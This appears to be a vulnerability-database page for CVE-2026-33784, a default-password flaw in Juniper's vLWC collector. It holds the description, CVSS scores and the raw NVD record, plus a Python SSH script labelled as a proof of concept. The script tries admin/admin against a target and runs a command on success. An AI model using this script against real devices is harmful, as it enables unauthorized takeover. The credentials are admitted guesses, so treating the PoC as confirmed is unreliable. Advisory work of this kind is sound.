CVE-2026-33784

Description

A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible.This issue affects all versions of vLWC before 3.0.94.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

vLWC < 3.0.94

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import paramiko
import time

def check_vuln(target_ip, port=22):
    """
    PoC for CVE-2026-33784: Default Password Vulnerability in Juniper vLWC.
    Attempts to login using default credentials.
    Note: Replace default_user and default_pass with actual credentials if known.
    Common defaults might be admin/admin or root/password.
    """
    # Common default credentials placeholder
    default_user = "admin"
    default_pass = "admin"

    try:
        # Initialize SSH client
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        
        print(f"[*] Attempting connection to {target_ip}:{port}...")
        
        # Attempt login with default credentials
        client.connect(target_ip, port=port, username=default_user, password=default_pass, timeout=5)
        
        print(f"[+] SUCCESS: Logged in with {default_user}:{default_pass}")
        print(f"[+] Device is vulnerable to CVE-2026-33784")
        
        # Example command execution to verify control
        stdin, stdout, stderr = client.exec_command('whoami')
        output = stdout.read().decode().strip()
        print(f"[+] Current user: {output}")
        
        client.close()
        return True

    except paramiko.AuthenticationException:
        print(f"[-] Failed to authenticate. Credentials may be changed or incorrect.")
        return False
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return False

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with target IP
    check_vuln(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33784
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33784
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33784/
[4] VulDB https://vuldb.com/cve/CVE-2026-33784
[5] https://kb.juniper.net/JSA107871

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33784", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:27.820", "lastModified": "2026-04-13T15:02:27.760", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Use of Default Password vulnerability in the Juniper Networks \n\nSupport Insights (JSI) \n\nVirtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device.\n\nvLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible.This issue affects all versions of vLWC before 3.0.94."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:L/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1393"}]}], "references": [{"url": "https://kb.juniper.net/JSA107871", "source": "[email protected]"}]}}